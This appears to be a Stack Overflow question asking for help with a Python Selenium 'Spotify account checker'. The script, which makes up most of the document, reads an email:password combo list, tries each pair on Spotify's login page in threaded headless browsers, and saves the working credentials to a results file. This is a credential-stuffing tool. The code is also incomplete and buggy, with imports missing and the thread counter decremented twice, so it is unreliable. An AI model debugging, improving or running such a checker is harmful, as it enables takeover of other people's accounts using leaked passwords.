# I built a Spotify Checker but It's not working

Tags: python, selenium-webdriver, selenium-chromedriver, spotify

I built a spotify account checker and tried to test it, but always my results are invalid even through my accounts are valid. I tried to change the url but nothing changed. I tried to change thread number, but it still says invalid to valid accounts. And I tried to change language of the search engine's default language, checked and changed if-else statements, `time.sleep()`'s (i thought maybe my internet speed couldn't reach the processes of ChromeDriver but they still went invalid) and this problem still occurs. I have no solution idea left so, i found myself here.

Here's my code:

```
from selenium import webdriver
from selenium.webdriver.common.by import By
from colorama import Fore, Back
import colorama

# <==== Configs ====>

MAX_THREADS = 5
CURRENT_THREADS = 0

COMBO_PATH = 'accounts.txt'

RESULTS_FILE_NAME = f'results/results-{datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S")}.txt'

colorama.init(autoreset=True)

options = webdriver.ChromeOptions()

options.add_argument("--headless")
options.add_argument("--disable-gpu")
options.add_argument("--incognito")
options.add_argument('--disable-extensions')
options.add_experimental_option('excludeSwitches', ['enable-logging'])

url = 'https://accounts.spotify.com/login'

# <==== Configs ====>

if not os.path.exists('results'):
 os.mkdir('results')

with open(COMBO_PATH, 'r') as file:
 accounts = file.read().split('\n')
 for i in accounts:
     if i == "":
         accounts.remove(i)


def check_account(account):
 global CURRENT_THREADS
 
 CURRENT_THREADS += 1
 
 driver = webdriver.Chrome(options=options)
 driver.get(url)
 driver.implicitly_wait(30)

 email, password = account.split(':')

 # login process
 driver.find_element(By.CSS_SELECTOR, '#login-username').send_keys(email)
 driver.find_element(By.CSS_SELECTOR, '#login-password').send_keys(password)
 driver.find_element(By.CSS_SELECTOR, '#login-button').click()
 # login process

 time.sleep(5)

 # valid
 if driver.current_url == "https://accounts.spotify.com/tr/status" or driver.current_url == "https://open.spotify.com":
     print(f"{Fore.BLACK}{Back.GREEN}[VALID]{Back.RESET}{Fore.RESET} {email}:{password}")

     with open(RESULTS_FILE_NAME, 'a') as file:
         file.write(f"{email}:{password}\n")
     
     CURRENT_THREADS -= 1
 else:
     # invalid
     print(f"{Fore.BLACK}{Back.RED}[INVALID]{Back.RESET}{Fore.RESET} {email}:{password}")
 time.sleep(1)
 CURRENT_THREADS -= 1
 driver.close()


print(f"Running {MAX_THREADS} threads...\n")

for acc in accounts:
 while True:
     if CURRENT_THREADS == 5:
         time.sleep(1)
         continue
     break
     
 threading.Thread(target=check_account, args=(acc,)).start()
 time.sleep(1)

while True:
 if CURRENT_THREADS == 0:
     print(f'\nYour accounts were saved in "{RESULTS_FILE_NAME}"\n')
     break
 time.sleep(1)

input("Press enter to exit")
```

softwares i used:
python: 3.11.5
chromedriver : 117.0.5938.149
selenium : 4.5.0
colorama : 0.4.5

Comment: Please make this a [mcve]

Comment: I posted the full code because I didn't understand where the problem is.

Comment: https://ericlippert.com/2014/03/05/how-to-debug-small-programs/

Comment: first of all, it's not about 20 line small program (if it was, i would never come here ) second, i don't mean "i wrote a code but it doesn't working, come help" i came here because someone can give me suggestions about my problem and i can think about it for solution.